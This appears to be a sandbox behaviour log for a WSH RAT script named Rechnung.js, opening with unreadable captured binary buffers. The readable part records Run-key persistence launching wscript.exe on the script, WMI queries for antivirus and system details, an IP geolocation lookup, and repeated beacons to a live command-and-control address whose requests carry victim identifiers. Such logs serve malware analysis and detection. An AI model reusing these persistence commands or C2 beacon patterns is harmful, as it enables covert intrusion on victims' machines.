rL~®tȉ+ȁÅÀàW6¹êh°Ï°͐9ê€:" ¨AV¨ì0kÔ–WØÒ,تvÈ9@9éQO䄜Q/Ôö¶ êƒ\‘ê‹ÜQ?Ô @‘„8ÈyÁ6à"òF>È F~°ŸP BÁ(…¢!°áÃQâ#ŠDQ( E1hX»;S"“!¾Rž-&ð('Iå8š„ \æÍó4Tð \¬ÆROW+‰¼pKC@Ô¦©¨Ù”<‰‘C°µmäF#àR.Pªx®4]×ÊH#Àe¸ÑÉt…­m‘)­‡d¥,GŽPæ(Ô J©Bmdll Mc’2V™.–§»-ƒ(©B—)Uz¦ZQK‹Ÿ%VdâqJµ4Cš.VK• æ&ŒH]””P©uáúÚ´jG)ú[.D­. ¦Æ@®×œÚ–!©1˜ D«Ñ´e¨c¦™[S†Z )ˆƒßòÏMJ6Z•‰d´Šu{"ÓF­˜ YWAö5mKMW%ËQe‘Î#r22pB¥ci¨‰ÆÕ©jRãÂlqºî¥« %z³kJi,µ7@d4 s1!Íœò² ãnëöD¦(OԄ©Õ„4-G«ôÝêŒD†‰0֚ŠÚb"¨ö´˜Ç(2”„œZ£yCÅ ‰ 7fʦY%”N3¶§„:íÈ©&M@ÜÜÓ/šºBmÒnl@ ©¶B,K«³âÄr\ a‚Mš´¥1̜IR“#kQœPOc µiJyUfBՐQëM¦È4˜J“rU›#TSE¦éÈõ5Ã8t5 f) µi[H’py69Æ¶úhŠ•‰e¨?®3SÚÏ Ödú’ uz?ñIJã…Ý–È'‘=KDÛÐÝB:²‘98‘gê.ÉP‘ˆ‹%ú§h‘hº§Ð‘i›Bø!SㄱV‘ˆË•¹&o%4Q›¦"$ÄՑ I|†~ðzRa;Õ؄ÎH$jÇ\¤5o·N¶cÓ¬¢nu³g ×ïêN…‘Fhªfê ›ÛÉb™T" ¶ ­Z5£2£µ§#kmêF¤'RÍmt«¾UÔÒÒ®+liGÃ.ÒM¡âÿ“z—Ø3 åä{̄܂‰àRó®¥P÷=Xó1ƒáŸÉHˆRà3%B+Å£8èÇÀg´Éã³á£æmŒ%<o¢ýÒì‡ ¯¹P-!DjD )R Lð&E2„ƒgÊ@J°9LÙ`ð<ŒÁ“0ùA½‹…§k<+‘e#1ØçA4bèá”ïà)ü*‘ Ȁs°)k¬ÉO1H¤ÐR òúmÀ—öÜ@E•‚m«‚'ïlè AOz#ãÎAiÐ@4± ŸÏô­~’<µŽçBäž\x¶çÁõPm_ðщ¨D€Or¼¤Ù £Fq©qþ†P¾#+8™'5u\‘L'b*V«ª9Rò˜žh-Ù&G9ɆܑW›‰²ùnr Äó÷óç špð$ƒïV/*ª‡S(>É+B(”Š;¾ÙRÚ·6gŠÏƯÉq™¤é kÞwB$šÜJ@2ä¤$üã-×A®=rFó¨sáà<µÑ¹ gµí9E°.ȵ› ç L¬l„ܨ—ºIT ð)Ó[•öæLô™ƒzWM§#,?ÄÝÜb`ÁЂÆδôÒü±è4× ³07ó°fÐÍknéaNcÒòýè4fi(Œ9èHº` *e–Ñg ÌEgÓvHuå̲ø„‰OXý‚®ï‰[jË¿\šo7ËgÇò[KtÎò†p[y:~9÷é%T„‡±Î-ÑÌ „)TDŒQLs}”Ëº’Ž,K‘X•7¯j¥‚kƒY“¬‰¸D®TH¸½0'Rbɲ!M'”*e†šÍWÙJ‚úåº`½I=ƒÕ½UOþüq„j±<›ÀÇz9tæÆ0?®Ÿ¯¿ßXèúët±™ÿHd0KRoÅb„Çó¹ý°¾š^/_š ¿el0’)Œ äò"|8<oÇßOàÃ틹j.ÈÉä q‚¼•Ãòi}tL3CŒ|ZX4Kz>†¶[J‹\îHc\vƖŽ÷Iuôz (n½unSQý–Ýn.ÅXÄúNïe»Þ%ýµâ)ݦnvýû‘ÿ >¶##0ðHØȪºêï'×_Ý%?*X:³Ø½áË起Öo· P8ÕÕ_z•¾e`ãñ¹ie‡&ªV$œÖ±Ú…u!ùY­L¸²i͍0¿¼é=Ï¥Z+7Û  í\·îË[W Ùt¦˜DUóSG½lͯ]IhØ6k³8ww¿AiþáÖw¶G.Éû¦‚7ÚÕêǑY%?åÏÛøÍ槴£«Rë&ím²s©oU€mÜ¿wª¯:ÚÌb>ý+ÈÝîcvwnùOûÚG‡Mû.Ÿf1Ü!¥ÎÖL{¦íBòÇҔ áÉþZ—cûÕ֏ÔrvevÇìgغú4ÝHŒÊ¶|ö.÷ݏNøîé‚%‘½™#°áXLitid?K­ÎôòJ'džrí<y¦+å^ٓ¤¤Ô+›PJrÒÕ*¯–i$g‘šDX”ž`‚6ï[Ð̬ÆŒÅ†aCµ}Œ^Ü|‚)S¦˜:N´ãY±Èxû2É%Øì’ÑÑ`?2ÈUêv$ñúŽ lm·¨â’1MW‡Äy-J]Øô±¢#s‘ë®­rN‡ sƯ Ú¡žðå”!,™SÕ¤ÝS+_—p­=´éK†µ£uá…ì¿<ÐçcÔý®×j¿>¸ûlja ‡ šòõ•Iž…ì%N…m)ãÙy}áµxœÕêÄsyqó¦®H…Ô½müÏ Ç²mܕ¥#ïŒ>rÐ%íÑ|÷ÓÒa×;íÜÐ4(÷Õ¥ñ‹o^-sPþ¸¼iÀ»Õ1nNÄ°yË/Ÿ<Üs¹uà¡{AùÛùë&8å$÷šÙ½rOADZ1….V³rçòUãšÝ·~ÕïNÆâ÷i£ÖÚñùƒ'»WÎ>ö¡ªØ¨b—[«mjß±?žw=•RDÞÕЦV±¼¤
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: `üàÂw&¶²½¯ÉæÜ_¢–¾Þå¥ NÊÅÞ%aϛÜ~Ÿí-[‰a gj ®T(¹¨´Tââ>€Í‹eCí¡ÇW™Jٝ’#Ì3‰=T&åºYƒFï1%ÁbYÕrw >O/q55?ÀÂ׊³Òʼn&:oÔó#©/ãÓ۝VYrîøá {‘7H·Œäº;n·Tïà;Ü­M)@·:´Lˆ'Ì",PÆì¯àèü^9ÁoR Þcü¦þø ¼±ùxÁ#ü†y€£âïûÿ ½¦\/ºÎvӚ‹â}õøDCœÊ弎r%F‚åîÌn…<'€Žh£O=êôÅH*ÉðüX=€yÉzÖ³z1ƒ` 5v5¨¶•‡1ðÁú†95ǞçÌmšù¥´”Ú3j¯îîÈtbuétJ¢¦n?ºaþæì°¬Za@×ÔYY.–Ü€ËWTq'Q8v­îÝn~ÐìÜê)™¥¹õ©‡äæ5ÕR™{/ ]’3#ba5ˊ™|»”ºí—I$w þÐoéŠÛ(žFÓ‰]zòîŒlåKNõ‡`7 ˆk[Âèy߈Cä2¼¢½­„bPƒ¼úá6Z}Î zç F$óß¡÷OuðwèMø-z#jXìgð…Ý`w¿)Æé†{x ÝóHS.%gä)8jm`p™þcPÿO)wÄXÆ×ë¡HóÌ•æ¹u¸«(‚Š¸œìumpIr:ž{†Upõ§†ØUh"·*ё(ǍxˆkVhÅS¿§äVº­ßéZ<Z†Ö|÷ÂøªÚé‘Ë9á“3w­ú|j§#×ѹýQæî³12Øí~ܛt‹ãÂÛ·«"WzjíU‘"˜hÎÙ ‚?o¤'F{‡NlƒºÝ¹äawÀiž·9ôÇ&­Ã6 ]}SA¶ tÇ»]?­f¡Ê GÒ³Ẃ~xUéfª§ "Ã>…ß3x*vSø©™V '÷̶@›ŠÆì»È빂 ½Ýk“{±®¤&°ò¢»Rµˆ€mhá«8M•R%Sۋ^eéYN|J ögˆ™]p„UCìud¥NU•”*š7?”<ôq§÷I: ˜ÍJëS6'1ÐwIͱÏUn\hãè€ú(0³]`¼¦3¯±òè]܃WB¶Õ0't¢eúšx-‹zy‘•HPŠ‹a鍒G5åV‰m÷ƒ¡×‹FUšCδ˜U?  $6Aá,Ы˜¤Ÿ*+|e\ꦎÖ+Á¥œY˜á–S’íLù6<Ä™š…y#Y7„©&yÅï}ÿørKüòű-©mŽW³eóôù̘ë!~ƒ®Þ€"UÊÀw’×Rë’´}œ…€³°"ƒ@b¹ý>¾üs×䫅œ ûtD×þˆ_,î·V4â¾–p øÀ·WO‘Á“†¨(qTÀ¸q%ÉÎu³ÜÔÆïÙ2ï„¿4ÁF¡†pár8*k ¸)K X¨ó™ó]¸à ítÎAZAMQPÃYGÕYSÇÐÔ j …ª:òñŠ $è×âB4™Ñ‡á§û ßí&¤0øÐýr‘»ZÞ0±uuü!¡ÂAH7øø… íäsú ­CçwâÛ°ÚU×RGÛO¯n¾·Hă:ôè¯\Ýæ·*Ó#—/Yߜd¥H÷²»+'q ºg‡>’$¸7áXÎä±VâJi¢¾ÄÚ:=—™ùl€UŸ&-á®çVÕÐÔòa€[bï¾XU†[¡²Ç éa™ú}¯]•§˜;‚DzXµ§´>RÊW—ψè0lRòr(å oX<„kP. o“‰² ¼‡î___¹X{Z…AXóàq‡'ÝÃ*¢¾ ã¹èd«ú¥ô"{ʯÝùý‚dͱNè¥VÂÚ-zlùÇi.jª€…ºn™¤Å ¼ÖóÚçt6›óSàŒ.™ñë¼¢CàȧUDǑúۘÃÏ÷0¾‰ã«ù·aŒóuÛ„¸ù—+h‚cŸN*ðñ@ŽÈЏQ|9:YcÏÖ㓯åØi#™œRtç0þ(V®Y‹¨·ï°5)Lb̄ܥ­_/°¢K¨@W•ZK@ z¹5“}Σ¡ÔþõrFÝ0q}!¦fÁf{ld؛óºÅü㑢ÁU7\ßØç¯õ Ìm¶çI›i± ¯²=ۘ_¹½-ñðý²P[Q…¡$ã@´Z‹p9Qÿý|.«gûÃ)1$~;w"dšâHçšjEÓXyóêFü¤5CFõÄÏ>.É厏’¨´[–ÎvϤ_>¤§xN)y>¡»,ˆ[´^FˆZH©p¯ãŒV (òfC—m­W]è«î™ñ¨úŁœMb§9'­Š¤%²ò_V+ºk¼… y¨fö. HDM_ˆž=À.}]œ¨ œAQÇÿÝ~ ¢êÌÑ~ÁÑ\™¢ "#– ÷ݞב½ôË=/ÈmQéîEåŠß»Ë‘åÉ„‚å)u t]KîùÁԋZrôŒd8€£a#èøú7ðšãƈšjÆQø€”¾UÄ#Ýú[‚û,Àü9¸i ÓtG¾Øç­0"…ð Bx>[ÈÐ/ņ…üôé}•ÝÛ'Oó,ë'6Ò¹´.ö6'Î;[dëÀø.‡ÒÏ ù=°ÅÚq3ªizŠäräÆþ`.8k«Ap5õFŸE"Mn>&0[cf¾g¯¶îÂ(£¬“´÷ê–íIp5Ĩ*•º1¡ž•1ãÕ !¥( Ûø*ªAá¾sо‡F‰ZÍց6 bÙ:‡«.©#³±“F*W{Û÷Y†]ëÂKP÷„èÞՖ‚æšY֓8;- ÒjÒRËⶓàIო^ø9ˆf¡Lø×*U”ß,5™ÀÕ+µ¬§§ä®yÈ¢5Ð.¿}ùn©(:ÀìʀâÒºŒ÷ …÷@ŒˆËg¿ƒéÈïøÜ"蠟ÚÉ̼àWaëNØ¡ãjœÜ$l<djº~ÚNæÎñó±ñA çÎqšBy8yyL9 SN@"hÂË5û΂™Þ»æYɀ¤5é T¶Aït:½’û×ÙÉGAÍ pü½ü]ßNbr"•¤Öõ±¹\½oäí“}9#P}ÀTT’ùp|ª¥&WmւtƋ:ùJêGº%Ê|=ºÑS·ÈÀ|~ø~¹áj©y›{§¯ÈjýôXìú L×$ÇÝ$¥aŠ\¬âÊ-eî­M™æ}Þl²ôxÕûO§Ðž-‘ [#Eۍ7¿«ÝZÏ=p™êýÈEL_oùÄÙo'/_FÅz²E{³®xg©…í¨áWn¸}‹Ä±Û_ç:D/Nš»ÓØÆé4™þc†xø2!ìbˆÎúZ¤Ñ§JÆ;Ll£Lxžâsõg”òî<„:¡DâØø¼Bm¤å-`ˆ²:¼Õ>³p‰×Ù–ٝÊ4€£ÛpT­sWUá8‰¢ü‚°Û È@à3¬°þ‰ø@à‡¼äèh”ïs‘ï¨øÛñú?Aᾉ²»yÙˉ},$…¤ÈÜ- ‹yéÎ­ËÙ.7mdž½ /Moo›Â'ÉzÂö¥1gM#:8®øÕxaNp±gI°“?I•¿qQÁú4ƻ °}d{™·|iæ@Ûí~k²H¡ˆf±ÅéÞXÍ>š«?³qõùWj‹}ºWÊîëôŠ½ä¼ìĪìÅZ23õêjš—WŒ4>™?e¢ã}wõQF”~ÎYŸö¾â¤)”2ã×ŧšk›ƒ™±µ½1ñ—|ˆùˆ=WÕÝ|48vç‚k¿¿\áÓÆÙÇËw¬8Ñô KÙtÏP_“™ <¶h¥àñ± RL³23v‹è:£hO p1"£?1$¾bßOqèßØÈß9ÿb“|‹p}5ZÃfSõŒ,ºE"ïé¾éˆ'ùß""nQ‹Ö?PˆŸÊóW!Ü/úv`ŽšÀÂXؗÁáB`0@ääVÈ RÈ/o¥,‘ÛÄÖؑ[JYÛÄÔÌÐùº—…“ þ¥92À †ÒÑ|sí’2BU]?Ö\îˆÒÑ;Ã?Nd™Ÿu㢣ùÌEL0¥ÓŠæeVϗ¤þnʯö°äÂc>ñ²qÄDOMÖtÖD4OðfÁ*†ÁHÏ{øl ¦¼Ý£\§{×ڕÀT†©u:g(WC²ŒTdÌ1'ĄÁŸ²fAñGoðKèY§2R,C"ڜbgRä¤ÖÕr_–Þ=Lt6¶†¯G1úÞ: qX¸ˆ¨ =¼Ð"`hƒ1¢FњÙoXW3î›C0fÕïuV¥0è’Jzüõæ'´—(ñ-³ß ×Þê¾h÷¸<¯ÒAΘlçQꣀÅ,BéãòbË ô&Ùr±Ùú>Ïmä3œ ­54 ͤ+E‰Þ{ òƒoœžxäí¢Û­æ~ßÿA_ϐˆ#ßá|õbU9«I¢zB‰ãÌõ¡!»þÝÃÎþ‰:šþu5#xa! œ ¥Ë,¯Ëô-wÒIQA™ŒæŽŠ—Ëß¡iÄxlÍ©*n¸¢]öoÀY ]’ÄêÆs™8£áÆÀÌÿüUQȍÇ4“þƒr<Faé-÷y®ÙƒÅ bM[f%陂©9 Þ I±‘¼1Ž´0P]闋Kö_> sMS#§T¦9•6ã!a$s äïPª¿V¼)"§V>65„c(Âö&œ£C@GT\’NKˆY§‘XÃxUù•{ÙëÁÚÈP O&{ét«éÞÆÑ3ñÑÎ 8)‚ÿ“ž9֎Q¿®)¾QÉpّ÷y")P!(GOÿ¿¶H¸¿— ¨tq÷”nÛۅ­EÛ¬hNÐÅI&íöèòW —Qƒ"×í/ü£ì·þ ½Á|’W†¬¬ƒ!¢èe¨…îϸ$aZϳĺ[Pæ¹ÙOí‚ÞèÚ= Io)lÛ P_'Ó{«é –Ù¼ª¸H¶«•ÒDŽLjG‚‹JøQ/¤H.¨eÖ<œº2{˜O’#ïÛ¹zm1·•Î€`dëÑÓó:%)†|M™9åoÍQ ˆGÜBèϦp“¹¦â;\¸þđƒ{êi—æʮԴ•ÿ¢¤’ÁkM®Á¶¦½eRá…r…^+©ƒä$ZÈEŅauÃéšç’[á.å|bcú<Zw8>X‚:7¢½É숢NE¾¼»n Ê\Oh7ŽFK0ïy²Ž{oðTÇN§W´ÙZ œD€“H}t„ &áAÔ}÷#LB‡¨¢F¡ü« †ƒ„ÑqNB„¡„á vÄØ"Ö èhÝüѵŸ66 è':ø)7V
request_handle: 0x00cc000c
1 1 0
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung reg_value wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
wmi select * from antivirusproduct
wmi select * from win32_operatingsystem
wmi select * from win32_logicaldisk
Time & API Arguments Status Return Repeated

InternetCrackUrlW

url: http://79.134.225.94:5200/is-ready
flags: 0
1 1 0

InternetCrackUrlW

url: http://ip-api.com/json/
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 4194304
http_method: GET
referer:
path: /json/
1 13369356 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

send

buffer: GET /json/ HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Accept-Encoding: gzip, deflate Host: ip-api.com Connection: Keep-Alive
socket: 1108
sent: 259
1 259 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

InternetCrackUrlA

url: http://ip-api.com/json/
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

send

buffer: POST /is-ready HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: WSHRAT|7C6024AD|TEST22-PC|test22|Microsoft Windows 7 Professional KN |plus|nan-av|false - 18/3/2021|JavaScript-v3.4|KR:South Korea Accept-Encoding: gzip, deflate Host: 79.134.225.94:5200 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 1124
sent: 331
1 331 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

InternetCrackUrlW

url: http://79.134.225.94:5200/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

send

buffer: POST /is-ready HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: WSHRAT|7C6024AD|TEST22-PC|test22|Microsoft Windows 7 Professional KN |plus|nan-av|false - 18/3/2021|JavaScript-v3.4|KR:South Korea Accept-Encoding: gzip, deflate Host: 79.134.225.94:5200 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 1148
sent: 331
1 331 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

InternetCrackUrlW

url: http://79.134.225.94:5200/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

send

buffer: POST /is-ready HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: WSHRAT|7C6024AD|TEST22-PC|test22|Microsoft Windows 7 Professional KN |plus|nan-av|false - 18/3/2021|JavaScript-v3.4|KR:South Korea Accept-Encoding: gzip, deflate Host: 79.134.225.94:5200 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 1148
sent: 331
1 331 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

InternetCrackUrlW

url: http://79.134.225.94:5200/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

send

buffer: POST /is-ready HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: WSHRAT|7C6024AD|TEST22-PC|test22|Microsoft Windows 7 Professional KN |plus|nan-av|false - 18/3/2021|JavaScript-v3.4|KR:South Korea Accept-Encoding: gzip, deflate Host: 79.134.225.94:5200 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 748
sent: 331
1 331 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

InternetCrackUrlW

url: http://79.134.225.94:5200/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

send

buffer: POST /is-ready HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: WSHRAT|7C6024AD|TEST22-PC|test22|Microsoft Windows 7 Professional KN |plus|nan-av|false - 18/3/2021|JavaScript-v3.4|KR:South Korea Accept-Encoding: gzip, deflate Host: 79.134.225.94:5200 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 748
sent: 331
1 331 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

InternetCrackUrlW

url: http://79.134.225.94:5200/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

send

buffer: POST /is-ready HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: WSHRAT|7C6024AD|TEST22-PC|test22|Microsoft Windows 7 Professional KN |plus|nan-av|false - 18/3/2021|JavaScript-v3.4|KR:South Korea Accept-Encoding: gzip, deflate Host: 79.134.225.94:5200 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 416
sent: 331
1 331 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

InternetCrackUrlW

url: http://79.134.225.94:5200/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

send

buffer: POST /is-ready HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: WSHRAT|7C6024AD|TEST22-PC|test22|Microsoft Windows 7 Professional KN |plus|nan-av|false - 18/3/2021|JavaScript-v3.4|KR:South Korea Accept-Encoding: gzip, deflate Host: 79.134.225.94:5200 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 416
sent: 331
1 331 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

InternetCrackUrlW

url: http://79.134.225.94:5200/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

send

buffer: POST /is-ready HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: WSHRAT|7C6024AD|TEST22-PC|test22|Microsoft Windows 7 Professional KN |plus|nan-av|false - 18/3/2021|JavaScript-v3.4|KR:South Korea Accept-Encoding: gzip, deflate Host: 79.134.225.94:5200 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 416
sent: 331
1 331 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

InternetCrackUrlW

url: http://79.134.225.94:5200/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

send

buffer: POST /is-ready HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: WSHRAT|7C6024AD|TEST22-PC|test22|Microsoft Windows 7 Professional KN |plus|nan-av|false - 18/3/2021|JavaScript-v3.4|KR:South Korea Accept-Encoding: gzip, deflate Host: 79.134.225.94:5200 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 416
sent: 331
1 331 0
parent_process wscript.exe martian_process "C:\Windows\System32\wscript.exe" //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
parent_process wscript.exe martian_process wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\weakref.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\nturl2path.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\lzma.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\encodings\__pycache__\latin_1.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\collections\__pycache__\abc.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\types.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\ctypes\__pycache__\util.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\posixpath.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\adodbapi\__pycache__\__init__.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\adodbapi\examples\__pycache__\db_table_names.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\copyreg.cpython-37.pyc
